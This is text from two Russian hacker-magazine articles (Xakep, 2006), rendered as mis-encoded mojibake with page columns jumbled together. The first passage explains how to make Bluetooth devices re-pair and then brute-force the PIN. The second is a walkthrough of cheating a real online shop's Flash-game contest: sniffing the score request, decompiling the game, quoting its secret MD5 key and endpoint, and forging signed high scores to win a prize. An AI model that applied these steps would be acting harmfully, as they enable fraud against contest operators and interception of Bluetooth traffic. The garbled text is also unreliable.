âçëîìùèêó íåîáõîäèìî ýòîò àäðåñ ïîääåëàòü è îòïðàâèòü â ïîëå «source» ïàêåòà, òðåáóåìûé BD_ADDR, íî ýòî òðåáóåò ñïåöèôè÷åñêîé àïïàðàòóðû! 4. Åñëè àòàêà ïðîéäåò óñïåøíî, òî ñâÿçü ìåæäó áëþòóñ- äåâàéñàìè îáîðâåòñÿ, è ïîëüçîâàòåëÿì ïðèäåòñÿ ñíîâà ââîäèòü PIN. Åñëè þçåð íå îëåíü, òî îí ñðàçó ïîéìåò, ÷òî òóò êàêîé-òî ïîäâîõ, è íå ââåäåò PIN çàíîâî. 1 Êàê òîëüêî ïàðèíã çàêîí÷åí, óñòðîéñòâà ïåðåõîäÿò íåïîñðåäñòâåííî ê ôàçå àóòåíòèôèêàöèè. Ïåðâûì äåëîì äåâàéñ Master îòñûëàåò AU_RAND-ñîîáùåíèå è æäåò â îòâåò âû÷èñëåííûé SRES. Âîçìîæíîñòü ïîòåðè êëþ÷à ñâÿçè äåêëàðèðîâàíà ñàìèì ñòàíäàðòîì ñâÿçè.  ýòîì ñëó÷àå slave-óñòðîéñòâî ïîñûëàåò çàïðîñ «LMP_not_accepted», ÷òîáû master çíàë, ÷òî êëþ÷ áûë óòåðÿí. Âûõîäèò, êàê òîëüêî ãëàâíîå óñòðîéñòâî îòîøëåò AU_RAND, õàêåðó îñòàíåòñÿ òîëüêî âíåäðèòü ïàêåò ñ «LMP_not_accepted» masteräåâàéñó. Óâåðåííûé â òîì, ÷òî slave äåéñòâèòåëüíî ïðîâàôëèë êëþ÷, master çàíîâî ïåðåçàïóñêàåò ïðîöåññ ïàðèíãà. Ïðè÷åì ïåðåçàïóñê pairing-ïðîöåäóðû îçíà÷àåò, ÷òî êëþ÷ ñâÿçè áîëüøå íå äåéñòâèòåëåí è èñïîëüçîâàòüñÿ áîëüøå íå áóäåò. 2 Âòîðîé ìåòîä àòàêè âûãëÿäèò íåìíîãî ïî-äðóãîìó.  íà÷àëå ôàçû àóòåíòèôèêàöèè master ãîòîâèòñÿ îòïðàâèòü AU_RAND âåäîìîìó óñòðîéñòâó. Åñëè âçëîìùèê óñïååò äî ýòîãî îòïðàâèòü IN_RAND-ñîîáùåíèå slave-àïïàðàòó, òî îí áóäåò äóìàòü, ÷òî ìàñòåð çàáûë êëþ÷ ñâÿçè. Ýòî çàñòàâèò óñòðîéñòâà ïåðåïîäêëþ÷èòüñÿ çàíîâî è åùå ðàç ïðîâåñòè ñîïðÿæåíèå. 3 Òåïåðü òðåòèé âàðèàíò ðàçâèòèÿ ñîáûòèé. Îïÿòü æå âî âðåìÿ àóòåíòèôèêàöèè ìàñòåð øëåò AU_RAND è îæèäàåò ïðèíÿòü â îòâåò ïîñ÷èòàííûé SRES. Åñëè æå âñëåä çà îòïðàâêîé AU_RAND master'ó ïîäñóíóòü îò ôîíàðÿ ïîñ÷èòàííîå SRES-ñîîáùåíèå, òî àóòåíòèôèêàöèÿ áóäåò ñ÷èòàòüñÿ ïðîâàëåííîé. Ïîñëå ýòîãî àïïàðàòû ïî-

ïûòàþòñÿ åùå íåñêîëüêî ðàç (êîëè÷åñòâî ïîïûòîê çàâèñèò îò óñòðîéñòâà) ïîâòîðèòü àóòåíòèôèêàöèþ.  êàêîé-òî ìîìåíò, êîãäà êîëè÷åñòâî íåóäà÷íûõ ïîïûòîê ïðåâûñèò ëèìèò, îñíîâíîå óñòðîéñòâî îáúÿâèò îøèáêó è ïîòðåáóåò íà÷àòü ñîïðÿæåíèå çàíîâî. Ýòè ìåòîäû îïèñûâàþò, êàê ïðèíóäèòü äåâàéñû «çàáûòü» link key, ÷òî ñàìî ïî ñåáå âåäåò ê ïîâòîðíîìó pairing'ó, à çíà÷èò, çëîóìûøëåííèê ìîæåò ïîäñëóøàòü âåñü ïðîöåññ ñ ñàìîãî íà÷àëà, ïåðåõâàòèòü âñå âàæíûå ñîîáùåíèÿ è âçëîìàòü PIN. ÐÅÇÓËÜÒÀÒÛ Â ïðèíöèïå, ÿ ìíîãîå ðàññêàçàë ïî ýòîìó ïîâîäó.  ñòàòüå íå óïîìèíàëèñü ëèøü ïîäðîáíîñòè ðàáîòû àëãîðèòìîâ E22, E21, E1 è îñîáåííîñòè øèôðà SAFER+, êîòîðûé ÿâëÿåòñÿ èõ îñíîâîé, — ýòî îòäåëüíûé ðàçãîâîð. Òàê âîò, òîëüêî ÷òî îïèñàííàÿ óÿçâèìîñòü èç ðàçðÿäà «êðèòè÷åñêèõ», è ýòî ïîäòâåðäèë ñàì Áðþñ Øíàéåð. Ìåòîä ïîäáîðà PIN'a íà ïðàêòèêå ðàáîòàåò ïðåêðàñíî, è âîò ðåçóëüòàòû, êîòîðûå îí ïîêàçàë (Pentium IV 3Ghz HT): Äëèíà PIN'a 4 5 6 7

Âðåìÿ (â ñåêóíäàõ) 0.063 0.75 7.609 76.127

Êàê âèäèøü, óâåëè÷åíèå äëèíû ïèí-êîäà íå îñîáî ïîìîãàåò, è ñîâåòîâàòü åãî â êà÷åñòâå ïàíàöåè ÿ íå áóäó. Íàñ÷åò òîãî, ÷òî ñïàðèâàòü äåâàéñû â ëþäíîì ìåñòå è ñ ïîäîçðèòåëüíûìè ëè÷íîñòÿìè âðåäíî, ÿ äóìàþ, òû è òàê ïðåêðàñíî çíàåøü. Ñêîðåå âñåãî, ïîêà ñîçäàòåëè ïðîòîêîëà òùàòåëüíî íå ïåðåñìîòðÿò ñõåìó èíèöèàëèçàöèè ñîåäèíåíèé è íå ïðåäëîæàò ÷òî-òî êîíöåïòóàëüíî íîâîå, áàã âñå åùå áóäåò àêòóàëåí. Åñëè ïðîâîäèòü àíàëîãèþ, òî íàèáîëåå óäà÷íîå ñðàâíåíèå áóäåò ñ Wi-Fi è WEP-ïðîòîêîëîì, î íåäî÷åòàõ êîòîðîãî óæå äîâîëüíî ìíîãî èçâåñòíî. ×åì ýòî ãðîçèò äëÿ ðÿäîâîãî ïîëüçîâàòåëÿ? Íè÷åì ïðèÿòíûì. Àòàêà ïîçâîëÿåò âûëàâëèâàòü è ðàñøèôðîâûâàòü ïàêåòû ïðÿìî âî âðåìÿ ïåðåäà÷è äàííûõ, ÷òî ïî ñóòè ÿâëÿåòñÿ îáû÷íûì ñíèôèíãîì.  òåîðèè, íàâåðíî, ìîæíî èçìåíÿòü/èñêàæàòü ñîäåðæàíèå ïàêåòîâ, êîòîðûìè îáìåíèâàþòñÿ äåâàéñû. HAPPY END Âïðî÷åì, íå áóäó ñãóùàòü êðàñêè. ß äóìàþ, ÷òî àòàêè òàêîãî ðîäà íå áóäóò ñëèøêîì ïîïóëÿðíû ñðåäè õàêåðîâ äî òåõ ïîð, ïîêà ïîä ýòî äåëî ýíòóçèàñòû íå çàðåëèçÿò óäîáíûé è ôóíêöèîíàëüíûé ñîôò. Âïðî÷åì, ê òîìó âðåìåíè, êàê ìíå êàæåòñÿ, ïðîáëåìó â Bluetooth íàäëåæàùèì îáðàçîì ïðîðàáîòàþò. À ÷òî ñåé÷àñ? Ñåé÷àñ ÿ ïðèâåë òåáå òîëüêî ôàêòû. ×òîáû íå ïîäâåðãíóòüñÿ âçëîìó (äàæå òàêèì èçîùðåííûì ñïîñîáîì), ïðîñòî áóäü îñòîðîæíåå è ñòàðàéñÿ îáðàùàòü âíèìàíèå íà íåîáû÷íûå ñèòóàöèè, âåäü åñëè ïîäóìàòü, òî íèêàêàÿ îøèáêà íå ìîæåò âîçíèêíóòü ïðîñòî òàê. BINARY YOUR’S z

072

XÀÊÅÐ 01 /85/ 06


ÂÇËÎÌ ÂÇËÎÌ ///// ISSUE

TEXT LEXX918 / LEXX918@MAIL.RU /

ÂÅÑÅËÛÉ ÊÎÍÊÓÐÑ ÈÑÒÎÐÈß Î ÒÎÌ, ÊÀÊ ÕÀÊÅÐÛ ÏÎÁÅÆÄÀÞÒ Â ÊÎÍÊÓÐÑÀÕ Ñ ÖÅÍÍÛÌÈ ÏÐÈÇÀÌÈ

Ê ÊÎÍÖÓ ÃÎÄÀ ÍÀ ÑÊËÀÄÀÕ ÔÈÐÌ, ÒÎÐÃÓÞÙÈÕ ÎÐÃÒÅÕÍÈÊÎÉ È ÄÐÓÃÈÌÈ “ ÆÅËÅÇÍÛÌÈ ÂÊÓÑÍÎÑÒßÌÈ, ÑÊÀÏËÈÂÀÞÒÑß ÈÇËÈØÊÈ ÒÎÂÀÐÀ, ÊÎÒÎÐÛÅ ÍÅÎÁÕÎÄÈÌÎ ÏÎ-ÁÛÑÒÐÎÌÓ ÑÏËÀÂÈÒÜ. ÒÛ ÌÎÆÅØÜ ÂÈÄÅÒÜ ÌÍÎÆÅÑÒÂÎ ÏÐÅÄÍÎÂÎÃÎÄÍÈÕ ÐÀÑÏÐÎÄÀÆ, ÑÊÈÄÎÊ È ÏÐÎ×ÈÕ ÒÐÞÊÎÂ, ÏÐÈÌÀÍÈÂÀÞÙÈÕ ÆÀÄÍÛÕ ÄÎ ÕÀËßÂÛ ËÞÄÅÉ. ÌÍÎÃÈÅ ÊÎÌÏÀÍÈÈ Â ÐÅÊËÀÌÍÛÕ ÖÅËßÕ ÎÐÃÀÍÈÇÓÞÒ ÐÀÇÍÎÎÁÐÀÇÍÛÅ ÊÎÍÊÓÐÑÛ ÍÀ ÑÂÎÈÕ ÑÀÉÒÀÕ, ÇÀ ÏÎÁÅÄÓ È ÄÀÆÅ Ó×ÀÑÒÈÅ Â ÊÎÒÎÐÛÕ ÄÀÞÒ ÖÅÍÍÛÅ ÏÐÈÇÛ. ÊÀÊ ÏÐÀÂÈËÎ, ÝÒÈ ÊÎÍÊÓÐÑÛ ÐÅÀËÈÇÓÞÒÑß ÊÀÊ ÏÎÏÀËÎ, È ÍÀØÅÌÓ ÁÐÀÒÓ ÇÄÅÑÜ ÌÎÆÍÎ ÏÎÆÈÂÈÒÜÑß ÏÎÈÑÊ ÆÅÐÒÂÛ Íà ñàìîì äåëå ÿ äîâîëüíî ëåíèâûé ÷åëîâåê è ïîýòîìó íèêîãäà íå ó÷àñòâîâàë â òàêèõ êîíêóðñàõ, íî â ýòîò ðàç êî ìíå îáðàòèëñÿ ñòàðûé ïðèÿòåëü, êîòîðûé âñåðüåç çàõîòåë ïîäíÿòü ê Íîâîìó 2006 ãîäó êàêîé-òî íîâûé äåâàéñ íà õàëÿâó. Åãî ñòàðàíèÿìè áûëî íàéäåíî íåñêîëüêî âïîëíå ñîëèäíûõ ðåñóðñîâ. Ìîé ðàññêàç îá îäíîì èç íèõ — ñàìîì ïðèâëåêàòåëüíîì, ñ ìîåé òî÷êè çðåíèÿ, ëèøü îò òîãî, ÷òî ñîçäàòåëè ñàéòà õîòü êàê-òî ïîçàáîòèëèñü î áåçîïàñíîñòè, ÷åãî íåëüçÿ ñêàçàòü îá îñòàëüíûõ. Èòàê, ýòî áûëî ÷òî-òî âðîäå çàóðÿäíîãî online-ìàãàçèíà ñ êó÷åé êîìïüþòåðíîãî æåëåçà. Àäìèíèñòðàöèÿ ïðîâîäèëà êîíêóðñ, â êîòîðîì íàäî áûëî ñûãðàòü â ëîãè÷åñêóþ èãðó. Ïî ðåçóëüòàòàì êîíêóðñà îïðåäåëÿëñÿ îäèí ïîáåäèòåëü, êîòîðûé ïîëó÷àë î÷åíü äàæå ñîëèäíûé ïðèç — ÆÊ ìîíèòîð «Philips 170b6». ß íå ñòàë â÷èòûâàòüñÿ â ïîäðîáíîñòè àêöèè, à ïðîñòî ïîðåãàëñÿ è ñûãðàë íåñêîëüêî èãð. ×åñòíî ãîâîðÿ, ðåçóëüòàò «âû íà 11451 ìåñòå» ìåíÿ íå î÷åíü ïîðàäîâàë. Îñîáåííî, åñëè ó÷åñòü, ÷òî ìîíèòîðîâ áûëî íå 12000, à âñåãî îäèí, è ñ òàêèì êîëè÷åñòâîì î÷êîâ ìíå íå ñâåòèëî åãî çàïîëó÷èòü.

074

ËÎÂËß ÍÀ ÆÈÂÖÀ Èãðà áûëà ðåàëèçîâàíà â âèäå Flash-ðîëèêà. Ñòàêàí çàïîëíÿëñÿ ðàçíîöâåòíûìè øàðèêàìè, êîòîðûå íàäî áûëî óáèðàòü ãðóïïàìè îäíîãî öâåòà. ×åì áîëüøå ãðóïïà, òåì áîëüøå î÷êîâ ïîëó÷àë èãðîê. Êàê òîëüêî âñå îñòàâøèåñÿ øàðèêè íå îáðàçîâûâàþò íè îäíîé ãðóïïû, èãðà çàêàí÷èâàåòñÿ, à ðåçóëüòàò ïåðåäàåòñÿ íà ñåðâåð, ãäå çàïèñûâàåòñÿ, ñðàâíèâàëñÿ ñ òàáëèöåé ðåêîðäîâ, è â çàâåðøåíèå âñåìó ïîëüçîâàòåëþ âîçâðàùàåòñÿ ÷èñëî — ìåñòî â òàáëèöå èãðîêîâ. Ïîëàãàåòñÿ, ÷òî íàäî äîëãî è óïîðíî èãðàòü â èãðó, ÷òîáû çàðàáîòàòü êàê ìîæíî áîëüøå î÷êîâ è ïîëó÷èòü çàâåòíûé ïðèç. Îäíàêî èìåííî ýòî íå âõîäèëî â ìîè ïëàíû. Ìíå ïðåäñòîÿëî ðàçîáðàòüñÿ ñ òåì, êàê èìåííî âûãëÿäèò âçàèìîäåéñòâèå ìåæäó ñåðâåðîì è íàøèì ôëåøîâûì êëèåíòîì-èãðîé. Åñëè ÿ ïîéìó, êàê ðåàëèçîâàíà ïåðåäà÷à äàííûõ, òî ñìîãó îòâåòèòü íà âîïðîñ: âîçìîæíî ëè ôàëüñèôèöèðîâàòü ðåçóëüòàòû èãð è äîáèòüñÿ òðåáóåìîãî ðåçóëüòàòà.  ïðèíöèïå ïîíÿòíî, ÷òî flash-êëèåíò ïåðåäàåò ñåðâåðó äàííûå ïî ïðîòîêîëó HTTP, íî êàê èìåííî è êàêèì ìåòîäîì — ýòî âîïðîñ. Âîïðîñ, îòâåòèòü íà êîòîðûé ìîæíî áàíàëüíî, îòñíèôàâ ñåòåâóþ àêòèâíîñòü âî âðåìÿ èãðû è ïîäñ÷åòà î÷êîâ.

XÀÊÅÐ 01 /85/ 06


ÊÀÊ ß ÏÐÎ ÕÎÄÈ ÊÎÍÊ ÓÐÑ Ë

ÇÀÐÅÃÈÑÒÐÈÐÎÂÀËÑß ÍÀ ÑÀÉÒÅ ÎÒÑÍÈÔÀË ÏÀÊÅÒ Ñ ÈÍÔÎÐÌÀÖÈÅÉ ÎÁ ÈÃÐÅ, ÊÎÒÎÐÀß ÎÒÑÛËÀÅÒÑß ÑÅÐÂÅÐÓ

RULES

ÐÀÇÎÁÐÀË ÔËÅØÊÓ, ÏÎËÓ×È ÄÎÑÒÓÏ Ê ACTIONSCRIPT-ÊÎÄÓ ÈÃÐÛ ÏÎÑÌÎÒÐÅË, ÊÀÊ ÃÅÍÅÐÈÐÓÅÒÑß ÏÎÄÏÈÑÜ ÇÀÏÐÎÑÀ, È ÍÀÓ×ÈËÑß ÅÅ ÑÎÇÄÀÂÀÒÜ ß ÌÎÃÓ ÑÎÇÄÀÒÜ È ÏÎÄÏÈÑÀÒÜ ËÞÁÎÉ ÐÅÇÓËÜÒÀÒ ÂÁÈÂÀÞ ÀÄÅÊÂÀÒÍÎÅ ×ÈÑËÎ Î×ÊÎÂ. ÊÎÍÊÓÐÑ ÂÇËÎÌÀÍ

ÑÕÅÌÀ ÏÐÎÕÎÆÄÅÍÈß ÊÎÍÊÓÐÑÀ

Äëÿ ýòîãî ÿ ðåøèë âîñïîëüçîâàòüñÿ ïðîãðàììîé «Essential NetTools 3.2», îäíàêî íàâÿçûâàòü òåáå ñâîé âûáîð ÿ íå áóäó, òàê êàê òû óæå äîñòàòî÷íî âçðîñëûé, ÷òîáû ñàìîñòîÿòåëüíî îïðåäåëÿòü èíñòðóìåíò, ñ êîòîðûì áóäåøü ðàáîòàòü. ß íàñòðîèë NetTools òàêèì îáðàçîì, ÷òîáû ïðîãðàììà ñëóøàëà 127.0.0.1:81/TCP ïîðò è ïîêàçûâàëà âñå äàííûå, ïðèëåòàþùèå òóäà. Çàòåì â ñâîåì áðàóçåðå ÿ óêàçàë, ÷òî íåîáõîäèìî èñïîëüçîâàòü ïðîêñèê localhost:81, è ïðèíÿëñÿ èãðàòü. Êàê òîëüêî ïîñëåäíÿÿ ãðóïïà øàðèêîâ áûëà óáðàíà, ôëåøêà íà÷àëà äîëáèòüñÿ ê ñåáå äîìîé è ñäàëà ñ ïîòðîõàìè ñâîèõ ñîçäàòåëåé. Îêàçàëîñü, ÷òî ïî îêîí÷àíèè èãðû flash-êëèåíò ôîðìèðóåò POST-çàïðîñ è îòïðàâëÿåò åãî ñåðâåðó. Ïðè÷åì â íåäðàõ çàïðîñà ïåðåäàþòñÿ ñëåäóþùèå ïåðåìåííûå:

flashk=0c248caeb075b660c39726e5ec449c52&action=add&email=c ool_xakep%40xakep_mail%2Eru&username=user_name&point=302  ñòðóêòóðå âîçâðàùàåìûõ ñåðâåðó äàííûõ ðàçîáðàòüñÿ î÷åíü ëåãêî. Ïîíÿòíî, ÷òî point=302 — ýòî ÷èñëî íàáðàííûõ î÷êîâ, username=user_name — ýòî èìÿ ïîëüçîâàòåëÿ, email=cool_xakep@xakep_mail.ru — ìûëî, action=add — êàêîé-òî ôëàã êîìàíäû âðîäå «äîáàâèòü ðåêîðä». Åäèíñòâåííàÿ íåïîíÿòêà — ÷òî çà ïàðàìåòð flashk=0c248? Îí ñîñòîèò èç 32-õ ñèìâîëîâ è î÷åíü íàïîìèíàåò çíà÷åíèå êàêîé-òî ïîïóëÿðíîé õýø-ôóíêöèè

âðîäå md5. Âèäèìî, ýòî ñâîåîáðàçíàÿ «ïîäïèñü çàïðîñà», ãàðàíòèðóþùàÿ ðàçðàáîò÷èêàì êîíêóðñà äîñòîâåðíîñòü äàííûõ. Äåéñòâèòåëüíî, êîãäà ÿ ïðîñòî ïîìåíÿë êîëè÷åñòâî íàáðàííûõ î÷êîâ, òî îáëîìàëñÿ: ñåðâåð âåðíóë îøèáêó. Çíà÷èò, â ñàìîì äåëå flashk — ýòî ïîäïèñü çàïðîñà, ñòðîêà, êîòîðàÿ ãåíåðèðóåòñÿ íåêîòîðûì, ïîêà íåèçâåñòíûì ìíå ñïîñîáîì èç îñòàëüíûõ ïåðåìåííûõ è, âîçìîæíî, êàêîé-òî åùå âòîðè÷íîé èíôîðìàöèè âðîäå âðåìåíè, äàòû èëè ïèíãà äî ñåðâàêà. ß, êîíå÷íî, óòðèðóþ, íî ãàäàòü çäåñü ãëóïî — íàäî ëåçòü â êèøêè flash-èãðû. ÏÐÅÏÀÐÈÐÎÂÀÍÈÅ Ñåé÷àñ óæå âñå áîëåå-ìåíåå ïðåäñòàâëÿþò ñåáå, ÷òî òàêîå Flash. Ýòî î÷åíü ìîùíûé èíñòðóìåíò äëÿ ñîçäàíèÿ óìíûõ èíòåðôåéñîâ è ðîëèêîâ, êîòîðûé îïåðèðóåò âåêòîðíûìè îáúåêòàìè. Âñÿ àíèìàöèÿ è èíòåðàêòèâ îïèñûâàþòñÿ íà ñïåöèàëüíîì ÿçûêå ActionScript. Ýòî ñâîé ñîáñòâåííûé èíòåðïðåòèðóåìûé ÿçûê ïðîãðàììèðîâàíèÿ, êîòîðûé íåðàçðûâíî ñâÿçàí ñ òåõíîëîãèåé Flash. Îí èìååò î÷åíü ìîùíóþ îáúåêòíóþ ñòðóêòóðó è ïîëó÷èë áîëüøîå ðàñïðîñòðàíåíèå è ïîïóëÿðíîñòü, íåñìîòðÿ íà ñâîè íå ñàìûå âïå÷àòëÿþùèå ñêîðîñòíûå ïîêàçàòåëè. Îäíàêî ìîãó ïîñïîðèòü, ÷òî äàëåêî íå âñå çíàþò, ÷òî ñöåíàðèé, óïðàâëÿþùèé flash-ïðèëîæåíèåì, õðàíèòñÿ â òåëå ñàìîãî ðîëèêà â òåêñòîâîì âèäå è ìîæåò áûòü ëåãêî îòòóäà ïîëó÷åí. Òî åñòü,

ÎÆÅÍÈÅÌ, ÕÐÀÍÈÒÑß Â ÏÐÈËÎ FLASH-Ï ÈÉ ÞÙ Ëß À ÏÐ Ó É, ÐÈ ÍÀ ÖÅ Ñ Î Ò, ×Ò ÍÅ ÂÑÅ ÇÍÀÞÒ ÒÜ ËÅÃÊÎ ÎÒÒÓÄÀ ÏÎËÓ×ÅÍ.. Ò ÁÛÒ Å È ÌÎÆÅÒ ÈÄ Â Ì Î ÂÎ Î Ò Ñ ÅÊ Ò Â ÊÀ ËÈ Î Ð Î ÒÅËÅ ÑÀÌÎÃÎ XÀÊÅÐ 01 /85/ 06

075


ÂÇËÎÌ ///// ISSUE

Íà äèñêå òû íàéäåøü äîêóìåíòàöèþ ïî ïðîãðàììèðîâàíèþ íà ActionScript, ñâåæèå âåðñèè ïðîãðàìì, à òàêæå îïèñàíèå íà ÷åëîâå÷åñêîì ÿçûêå ïðîòîêîëà HTTP.

ïåðåäàâàòü çàïðîñû íà óäàëåííûå ñåðâåðû. Ïðîñòî ÿ ÷åëîâåê ïðàêòè÷íûé è íàïèñàë áîëåå èëè ìåíåå óäîáíûé ñïëîèò. Ïîïðàâèâ ïàðó ïàðàìåòðîâ, òû ñìîæåøü âïèêèøêè flash-èãðû ïîçâîëÿþò ëåãêî îáîéòè ñàòü â òàáëèöó ðåêîðäîâ íå òîëüêî ñåáÿ, íî è ìàìó, áàáóøêó, ñîáàêó ñîñåäà è ëþáè«çàùèòó» äàííûõ ìûå òàïî÷êè. Èëè ïðîñòî ïîâòîðíî äîáàâîòëîâëåííûé POST-çàïðîñ, êîòîðûé ëÿòü ñåáÿ â ðåêîðäû, åñëè êòî-òî îñîáî îäàðåííûé ñêèíåò òåáÿ ñ ïüñãåíåðèðîâàëà èãðóøêà åäåñòàëà! Ãëàâíîå — è��åòü åùå îäèí ñóùåñòâóþùèé ìûëüíèê, íèê è åñëè ó íàñ åñòü flash-ðîëèê, ïîëó÷èòü óïðàâëÿþùèé ActionScript÷èñëî î÷êîâ, äîñòàòî÷íûõ äëÿ ðåêîðäà, íî è íå âûõîäÿùèå çà äîïóñêîä íå ñîñòàâëÿåò òðóäà. Äëÿ ýòîãî ïîäîéäåò, íàïðèìåð, ïðîãòèìûå ðàìêè. Îá ýòîì, êñòàòè, íóæíî ñêàçàòü îòäåëüíî. Ïîëå èìååò ðàçìåð 11 íà 12 êëåòîê. Ïîëó÷àåòñÿ 132 øàðèêà. Íà 5 ðàììà «SWF Decompiler MX 2005c», êîòîðàÿ, êàê ÿ ïîíÿë, ÿâëÿöâåòîâ â ñðåäíåì ïðèõîäèòñÿ ïî 26,4 øàðèêà êàæäîãî öâåòà. Ïðàêåòñÿ ëèäåðîì â ñâîåé îáëàñòè. Íà íåé è îñòàíîâèì ñâîé âûáîð. òèêà ïîêàçàëà, ÷òî ÷èñëî øàðèêîâ êîëåáëåòñÿ â ïðåäåëàõ îò 20 äî Øàðîâàðíàÿ âåðñèÿ íå áóäåò äîëãî ðàáîòàòü, íî íàì íà ýòî íàï35. Îïûòíûì ïóòåì ÿ ïîñ÷èòàë, êàê äàþòñÿ áîíóñû çà ãðóïïó îïðåëåâàòü: õâàòèò è ïÿòè ìèíóò :). äåëåííûõ ðàçìåðîâ, è íàïèñàë ïðîãðàììêó äëÿ îïðåäåëåíèÿ áîíóÑêà÷àâ è óñòàíîâèâ ïðîãðàììó, ÿ îòêðûë flash-èãðóøêó è ïðèíÿëñà ëþáîé ãðóïïû. Òåïåðü ïðèêèíåì íàøè øàíñû. Äîïóñòèì, íàì ñÿ èçó÷àòü åå êîä. Íåìíîãî ïîøàðèâ, ÿ íàòêíóëñÿ íà ôóíêöèþ î÷åíü ïîâåçëî, è øàðèêè â ñòàêàíå óïàëè â ïðèìåðíî ðàâíûõ äîëÿõ «SendScore», êîòîðàÿ è çàíèìàëàñü òåì, ÷òî îòïðàâëÿëà ðåçóëüïî 26 øòóê. Ïðè÷åì íàì óäàëîñü óáðàòü èõ âñå êó÷êàìè ïî 26 øòóê, òàò íà ñåðâåð. Íàñ ñ òîáîé èíòåðåñóþò ëèøü äâå åå ñòðîêè: ïîëó÷èâ çà êàæäóþ êó÷êó ïî 650 áàëëîâ. Ïîëó÷àåòñÿ 3250 áàëëîâ. _loc3.flashk = _root.calcMD5(String(nScore) + _root.mykey); Åñëè â îäíîé èç êó÷åê øàðîâ îêàæåòñÿ ìåíüøå, òî â äðóãîé — áîëü_loc3.sendAndLoad("http://zoom.cnews.ru/ru/flashgames/fg.php" øå. Òàêèì îáðàçîì, îáùàÿ ñóììà èçìåíèòñÿ íå íà ìíîãî. Èòàê, , _loc4, "POST"); 3250 — ýòî òåîðåòè÷åñêèé âåðõíèé ïðåäåë, äî êîòîðîãî ìîæíî «ñòàâèòü ðåêîðäû». Ñêàæó íàïåðåä, ÷òî ýòà ñóììà ïîçæå îêàæåòñÿ  ïåðâîé ñòðîêå âûñ÷èòûâàëñÿ íàø íåïîíÿòíûé ïàðàìåòð flashk. óìîïîìðà÷èòåëüíîé, ñ òî÷êè çðåíèÿ àäìèíèñòðàöèè ñàéòà, è âñå Êàê âèäèøü, îí è âïðÿìü ñ÷èòàë md5 õýø îò ñòðîêè, îáðàçîâàíïåðâûå 20 ÷åëîâåê ïåðåä çàâåðøåíèåì êîíêóðñà áóäóò ïðîñòî ñðåíîé ñîåäèíåíèåì äâóõ ñòðîê: íàøèõ î÷êîâ è êàêîé-òî íåèçâåñòçàíû èç òàáëèöû ðåêîðäîâ. íîé ïîêà ïåðåìåííîé mykey. Çàãëÿíåì â òàáëèöó ïåðâûõ 10 èãðîêîâ. Êàêîé-òî Âëàäèìèð çàíÿë Âòîðàÿ ñòðîêà ïðîèçâîäèò ñàì çàïðîñ (ìåòîäîì POST), ïåðåäàïîñëåäíåå â äåñÿòêå ìåñòî, íàáðàâ 1900 áàëëîâ. Ñåé÷àñ ìû åìó âàÿ ñåðâåðó äàííûå íà îáðàáîòêó. Ïîðûâ èñõîäíèêè åùå íåìíî«ïîìîæåì» âñòàòü íà 11 ìåñòî! 1902 áàëëà êàê ðàç õâàòèò. Âíîñèì ãî, ÿ íàòêíóëñÿ íà ñòðîêó: íóæíûå çíà÷åíèÿ â ïðîãðàììó, çàïóñêàåì åå íà âûïîëíåíèå. Ñêðèïò âîçâðàùàåò íàì çíà÷åíèå õýøà äëÿ íàøèõ 1902 áàëëîâ. mykey = Åãî-òî è íàäî ïîäñòàâèòü â HTTP-çàïðîñ. Äàëåå íóæíî ïîäñ÷èòàòü "sdfj(ghsel4kjh_t4893yt9w384htlw_3k4jth39_4ty3948t34jkt23498)"; äëèíó òåõ ñàìûõ «ïîëåçíûõ» äàííûõ, êîòîðûå ïîëó÷èò ñåðâåð, ÷òîáû ñåðâåð òî÷íî çíàë, ñêîëüêî èíôîðìàöèè åìó ïåðåäàþò. Ìîæíî Íó, òóò è êîììåíòèðîâàòü íå÷åãî, âåäü ýòî è åñòü íàø ñåêðåòíûé êëþ÷èê. ñäåëàòü ýòî àâòîìàòè÷åñêè, íî äëÿ íàãëÿäíîñòè ÿ îñòàâèë âñå êàê åñòü. Åùå ðàç çàïóñêàåì ñêðèïò íà âûïîëíåíèå. Îïà! Ìû ïîïàëè â ÑÒÀÂÈÌ ÐÅÊÎÐÄÛ òàáëèöó ðåêîðäîâ. Æàëü, ÷òî êòî-òî ïðè ýòîì åå ïîêèíóë! Âñå ñâåäåíèÿ ñîáðàíû, ìîæíî ïðèñòóïàòü ê äåéñòâèÿì. Êàê ëþáèòåëü ÿçûêà PHP, ÿ ïîääåëàë çàïðîñ åãî ñðåäñòâàìè. Òû æå ìîæåøü ïðîÍÀÃÐÀÆÄÅÍÈÅ äîëæèòü èñïîëüçîâàòü NetTools: ýòà ïðîãðàììà óìååò â òîì ÷èñëå è Âðåìÿ øëî, è êîíêóðñ ïîäõîäèë ê êîíöó. Âñå áîëüøå è áîëüøå ïîäîçðèòåëüíûõ ëè÷íîñòåé ïîÿâëÿëîñü íà ïåðâûõ ìåñòàõ (ÿ òóò íè ïðè ÷åì). Òîëüêî çà ïîñëåäíèå 2 äíÿ ìåíÿ ðàç 10 ñêèíóëè ñ ïåðâîãî ìåñòà. Êàæäûé áîÿëñÿ ïåðåâàëèòü çà íåäîïóñòèìûé ïðåäåë è ñòàâèë ðåêîðä íà 2—4 áàëëà âûøå ïðåæíåãî. Ãîíêà áûëà çàìå÷åíà àäìèíàìè, è îêîëî 20 ëèäåðîâ áûëî êèêíóòî è çàÓïîìÿíóòàÿ â ñòàòüÿ ïðîãðàììà NetTools ðóìåíò äëÿ áàíåíî â ïîñëåäíèé ìîìåíò. Íà ôîðóìå ðàçâåðíóëñÿ íåøóòî÷(www.tamos.ru) — ôóíêöèîíàëüíûé èíñò ïîìî÷ü è â íûé ñïîð, ãäå è ÿ óñïåë ïðèíÿòü ó÷àñòèå. Ïîëíûé èãíîð ñî ñòîðàçëè÷íûõ èññëåäîâàíèé. Ìîæåò çäîðîâîåäíåâíîé ðàïîâñ â è ÿõ, ðîíû ìîäåðàòîðîâ, äà è ïðîñòî ïëîõàÿ ïîãîäà, óáèëè âñÿêóþ íàêàíè èçûñ ûõ ðîíí ýëåêò õ òâîè î èíñòðóäåæäó ïîëó÷èòü ãëàâíûé ïðèç. Õîòÿ íàäåÿòüñÿ íà ýòî íåëüçÿ áûáîòå. Ïðîãðàììà âêëþ÷àåò â ñåáÿ íåñêîëüê å: ëî ñ ñàìîãî íà÷àëà. ìåíòîâ, ñðåäè êîòîðûõ ÿ âûäåëþ ñëåäóþùè äÿùèõ Àáñîëþòíàÿ íåêîìïåòåíòíîñòü è õàëàòíîå îòíîøåíèå ê ñòîëü - NetStat (îòîáðàæàåò ñïèñîê âõîäÿùèõ è èñõî ñåðüåçíîìó âîïðîñó 